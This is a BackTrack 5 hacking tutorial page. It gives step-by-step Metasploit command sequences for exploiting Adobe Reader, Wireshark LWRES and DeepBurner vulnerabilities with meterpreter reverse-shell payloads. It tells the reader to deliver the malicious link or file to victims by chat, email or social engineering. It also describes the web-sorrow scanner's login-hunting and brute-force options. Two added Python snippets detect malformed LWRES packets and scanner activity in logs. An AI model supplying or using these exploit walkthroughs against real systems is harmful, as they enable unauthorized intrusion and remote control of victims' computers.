BackTrack 5 Tutorials

Hack any PC in LAN using Adobe Doc.media.newPlayer Use After Free Vulnerability


This module exploits a use-after-free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.

Exploit Targets

Adobe Reader 9.2

Windows XP SP2

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/adobe_media_newplayer

msf exploit(adobe_media_newplayer) > set payload windows/meterpreter/reverse_tcp

msf exploit(adobe_media_newplayer) > set lhost 192.168.1.2 (IP of the local host)

msf exploit(adobe_media_newplayer) > set srvhost 192.168.1.2 (this must be an address on the local machine)

msf exploit(adobe_media_newplayer) > set uripath adobemediaplayer (the URL path to use for this exploit)

msf exploit(adobe_media_newplayer) > exploit

Now give the victim this URL: http://192.168.1.2:8080/adobemediaplayer

Send the link of the server to the victim via chat or email or any social engineering technique.

Once the victim opens the link, you have access to the victim’s PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID” to interact with that session.

Hack PC in LAN using Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow


The LWRES dissector in Wireshark versions 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function; several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method; however, this packet will usually get fragmented, which may cause additional complications. NOTE: the vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.

Exploit Targets

Wireshark 1.2.5

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/multi/misc/wireshark_lwres_getaddrbyname

msf exploit(wireshark_lwres_getaddrbyname) > set payload windows/meterpreter/reverse_tcp

msf exploit(wireshark_lwres_getaddrbyname) > set lhost 192.168.1.2 (IP of the local host)

msf exploit(wireshark_lwres_getaddrbyname) > set rhost 192.168.1.56 (IP of the remote host)

msf exploit(wireshark_lwres_getaddrbyname) > set target 4

msf exploit(wireshark_lwres_getaddrbyname) > exploit

Before running the exploit command, Wireshark on the remote host (rhost) must still be capturing traffic, since the vulnerable code is reached only when the packet is dissected and rendered, as in the picture below.
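A defender-side sanity check for the packet type described above, added here as an example (it is not part of the original tutorial, of Metasploit or of Wireshark): it parses the LWRES header and the getaddrsbyname request body using BIND's lwres wire layout (big-endian; header of length, version, pktflags, serial, opcode, result, recvlength, authtype, authlength; body of flags, addrtypes, namelen, name, trailing NUL) and flags a declared name length that exceeds the bytes actually present or an assumed ceiling. The ceiling value and the builder's sample packets are assumptions made for this example, since the page gives no buffer size.

```python
import struct

# LWRES fixed header (28 bytes, big-endian): length, version, pktflags,
# serial, opcode, result, recvlength, authtype, authlength.
HEADER = struct.Struct(">IHHIIIIHH")
OPCODE_GETADDRSBYNAME = 0x00010001
# Fixed part of the getaddrsbyname request body: flags(4), addrtypes(4), namelen(2).
GABN_FIXED = struct.Struct(">IIH")

# Assumed ceiling for a sane name length. The page gives no buffer size for
# the dissector, so this is a placeholder to tune for your own IDS rule.
NAME_LEN_CEILING = 128


def build_gabn_request(name, declared_len=None, flags=0, addrtypes=1):
    """Constructed sample: one getaddrsbyname request datagram. declared_len
    lets a test craft a namelen field that disagrees with the bytes present."""
    namelen = len(name) if declared_len is None else declared_len
    body = GABN_FIXED.pack(flags, addrtypes, namelen) + name + b"\x00"
    header = HEADER.pack(HEADER.size + len(body), 0, 0, 1,
                         OPCODE_GETADDRSBYNAME, 0, 0, 0, 0)
    return header + body


def check_lwres_packet(data):
    """Return findings for one LWRES datagram (empty list = looks sane).
    Feed it reassembled data: the page notes that a long name is usually fragmented."""
    findings = []
    if len(data) < HEADER.size:
        return ["truncated header"]
    length, _ver, _pf, _serial, opcode, _res, _recv, _at, _al = HEADER.unpack_from(data)
    if length != len(data):
        findings.append("declared length %d != datagram length %d" % (length, len(data)))
    if opcode != OPCODE_GETADDRSBYNAME:
        return findings  # only the getaddrsbyname request is inspected here
    body = data[HEADER.size:]
    if len(body) < GABN_FIXED.size:
        return findings + ["truncated getaddrsbyname body"]
    _flags, _addrtypes, namelen = GABN_FIXED.unpack_from(body)
    present = len(body) - GABN_FIXED.size  # bytes after the namelen field
    if namelen > present:
        findings.append("namelen %d exceeds the %d name bytes present" % (namelen, present))
    if namelen > NAME_LEN_CEILING:
        findings.append("namelen %d exceeds ceiling %d" % (namelen, NAME_LEN_CEILING))
    return findings
```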

Hack Remote Windows PC with AstonSoft DeepBurner (DBR File) Path Buffer Overflow


This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft’s DeepBurner (Pro, Lite, etc.). An attacker must send the file to the victim and the victim must open it. Alternatively, it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extension is registered to DeepBurner.

Exploit Targets

AstonSoft’s DeepBurner 1.9.0.228

Windows XP SP2

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/fileformat/deepburner_path

msf exploit(deepburner_path) > set payload windows/meterpreter/reverse_tcp

msf exploit(deepburner_path) > set lhost 192.168.1.2 (IP of the local host)

msf exploit(deepburner_path) > exploit

After the malicious .dbr file is generated, it is stored on the local machine at:

/root/.msf4/local/msf.dbr

Now set up a listener to handle the reverse connection the victim sends back when the exploit executes:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.2

exploit

Now send msf.dbr to the victim. As soon as they download and open it, you get a Meterpreter shell on the victim’s computer.

web-sorrow – A Remote Web Scanner for Version Detection, Misconfiguration, and Server Enumeration


web-sorrow is a Perl-based tool for checking a web server for misconfiguration, version detection, enumeration, and server information. It is NOT a vulnerability scanner, inspection proxy, DDoS tool or an exploitation framework.

Some features of web-sorrow are:
  • CMS (Content Management System) detection
  • Port scanning
  • Login page scanning
  • Proxy support
  • Error bagging

Download the latest version (Wsorrow_v1.3.6.zip) and unzip it:

unzip Wsorrow_v1.3.6.zip

To run the script, use this command:

perl Wsorrow.pl

Current functionality:

-S – standard: a set of standard tests including directory indexing checks, banner grabbing, language detection, robots.txt retrieval, and 200-response testing (some servers send a 200 OK for every request)

-auth – looks for login pages using a list of the most common login files, directories and admin consoles. The list doesn’t need to be very big, because what else are you going to name it? notAlogin.php???

-Cp – scans with a huge list of plugin directories; the list is a bit old (2010)

-I – searches the responses for interesting strings

-Ws – looks for web services such as hosting provider, blogging services, favicon fingerprinting, and CMS version info

-Fd – looks for things people generally don’t want you to see. The list is generated from a large number of robots.txt files, so whatever it finds should be interesting.

-Fp – fingerprints the server based on its behaviour (unrefined as of yet)

-ninja – a lightweight and undetectable scan that uses bits and pieces from other scans

-Sd – brute-forces subdomains

-Db – brute-forces directories with the big DirBuster database

-ua – use a custom User-Agent. PUT THE UA IN QUOTES if it contains spaces

-proxy – send all HTTP requests via a proxy. Example: 255.255.255.254:8080

-e – run all the scans in the tool

web-sorrow also performs false-positive checking on most of its requests (it is fairly accurate but not perfect).

Examples of usage

basic: perl Wsorrow.pl -host scanme.nmap.org -S

look for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth

CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I

most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e -ua "I come in peace"
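Seen from the server side, the -S, -auth and -Db scans described above leave a recognisable trail: one client touching robots.txt plus a string of login and admin paths, most of them answered with 404. The detection logic below is an added example (not part of web-sorrow or of the original post) run over constructed combined-format access-log lines; the probe path set, thresholds, IPs and log lines are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Combined log format (Apache/nginx). The SAMPLE_LOG lines are constructed.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Paths of the kind the -S, -auth and -Fd scans probe. This set is an
# assumption for the example, not web-sorrow's own word lists.
PROBE_PATHS = {"/robots.txt", "/admin/", "/login.php", "/wp-login.php",
               "/administrator/", "/phpmyadmin/", "/cpanel/", "/backup/"}

SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2012:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 120 "-" "I come in peace"
10.0.0.5 - - [12/Mar/2012:10:00:01 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "I come in peace"
10.0.0.5 - - [12/Mar/2012:10:00:02 +0000] "GET /login.php HTTP/1.1" 404 210 "-" "I come in peace"
10.0.0.5 - - [12/Mar/2012:10:00:02 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "I come in peace"
10.0.0.5 - - [12/Mar/2012:10:00:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "I come in peace"
10.0.0.5 - - [12/Mar/2012:10:00:03 +0000] "GET /backup/ HTTP/1.1" 403 199 "-" "I come in peace"
10.0.0.9 - - [12/Mar/2012:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2012:10:00:05 +0000] "GET /robots.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

def parse_log(lines):
    """Yield one dict per well-formed combined-format line; skip the rest."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def find_scanners(lines, min_probes=4, min_not_found=3):
    """Return {ip: summary} for clients whose requests look like enumeration:
    many distinct probe paths (login/admin hunting) or many 404s (directory
    brute force) within the supplied log window."""
    per_ip = defaultdict(lambda: {"probes": set(), "not_found": 0, "agents": set()})
    for rec in parse_log(lines):
        info = per_ip[rec["ip"]]
        info["agents"].add(rec["ua"])  # a custom -ua string shows up here
        if rec["path"] in PROBE_PATHS:
            info["probes"].add(rec["path"])
        if rec["status"] == "404":
            info["not_found"] += 1
    return {ip: info for ip, info in per_ip.items()
            if len(info["probes"]) >= min_probes or info["not_found"] >= min_not_found}

if __name__ == "__main__":
    for ip, info in find_scanners(SAMPLE_LOG.splitlines()).items():
        print(ip, sorted(info["probes"]), info["not_found"], sorted(info["agents"]))
```

A server that answers 200 OK for every request (the case -S tests for) blanks out the 404 signal, so the distinct-probe-path count is the more robust of the two thresholds.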
